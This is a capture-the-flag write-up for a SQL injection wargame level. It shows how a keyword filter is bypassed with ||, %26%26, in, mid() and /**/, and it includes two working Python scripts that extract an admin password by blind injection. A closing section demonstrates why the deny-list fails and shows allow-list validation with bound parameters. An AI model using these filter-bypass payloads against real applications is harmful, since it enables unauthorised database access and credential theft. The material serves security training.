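Approach to the problem
1. ' (single quote) is filtered, and so are substr, ascii, =, or, and, whitespace, like, and 0x
2. Blind SQL Injection
2.1 Finding the length of pw
or, and operators -> bypassed with || and %26%26 (URL-encoded &&)
like, = operators -> bypassed with in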
import requests

url = 'https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php?'
cookie = {"PHPSESSID": "ehfeb49bjnrn7o6flaqbts8u2v"}

# Try each candidate length until the response contains "Hello admin".
for i in range(1, 100):
    # /**/ replaces the filtered whitespace; %26%26 is the URL-encoded &&.
    params = 'no=1/**/||/**/id/**/in/**/("admin")/**/%26%26/**/length(pw)/**/in("' + str(i) + '")'
    response = requests.get(url, cookies=cookie, params=params)
    if "Hello admin" in response.text:
        print(i)
        break
2.2 Finding the value of pw
substr function -> bypassed with the mid function
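import requests
import string

url = 'https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php?'
cookie = {"PHPSESSID": "ehfeb49bjnrn7o6flaqbts8u2v"}
# Candidate characters; named charset so the string module is not shadowed.
charset = string.ascii_lowercase + string.digits
ch = ''

# Walk positions 1..8 of pw and test one candidate character at a time.
for i in range(1, 9):
    # Progress label for the position currently being tested.
    print("pw의 {}번째 길이 : ".format(i))
    for j in charset:
        # mid(pw, i, 1) takes the place of the filtered substr().
        params = 'no=1/**/||/**/id/**/in/**/("admin")/**/%26%26/**/mid(pw,' + str(i) + ',1)/**/in("' + str(j) + '")'
        response = requests.get(url, cookies=cookie, params=params)
        if "Hello admin" in response.text:
            ch += j
            print(ch)
            break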
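
Why the keyword filter in step 1 fails, and what closes the hole instead: this is an example added here, not code from the challenge or from the original post. The deny-list regex is rebuilt from the list in step 1, and the accounts table, its rows, and the helper names are constructed assumptions.

```python
import re
import sqlite3

# Deny-list rebuilt from the filter listed in step 1 (constructed, not the challenge source).
DENYLIST = re.compile(r"'|substr|ascii|=|or|and|\s|like|0x", re.IGNORECASE)

# URL-decoded `no` value sent by the first iteration of the length script above.
PAYLOAD = '1/**/||/**/id/**/in/**/("admin")/**/&&/**/length(pw)/**/in("1")'


def denylist_allows(value: str) -> bool:
    """True when the keyword filter finds nothing to block."""
    return DENYLIST.search(value) is None


def parse_no(value: str) -> int:
    """Allow-list validation: `no` must be a short run of ASCII digits."""
    if not re.fullmatch(r"[0-9]{1,9}", value):
        raise ValueError("no must be an integer")
    return int(value)


def make_db() -> sqlite3.Connection:
    """Constructed stand-in table; only the column names come from the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (id TEXT, pw TEXT, no INTEGER)")
    db.executemany("INSERT INTO accounts VALUES (?, ?, ?)",
                   [("guest", "guest-pw", 1), ("admin", "placeholder-pw", 2)])
    return db


def lookup(db: sqlite3.Connection, raw_no: str):
    """Hardened lookup: validate first, then bind the value as a parameter."""
    row = db.execute("SELECT id FROM accounts WHERE id = 'guest' AND no = ?",
                     (parse_no(raw_no),)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print("deny-list lets the payload through:", denylist_allows(PAYLOAD))
    print("lookup('1') ->", lookup(db, "1"))
    try:
        lookup(db, PAYLOAD)
    except ValueError as exc:
        print("payload rejected:", exc)
```

The deny-list has an equivalent for every blocked token (in, mid, ||, &&, /**/), while the digit check and the bound parameter never let the value be parsed as SQL at all.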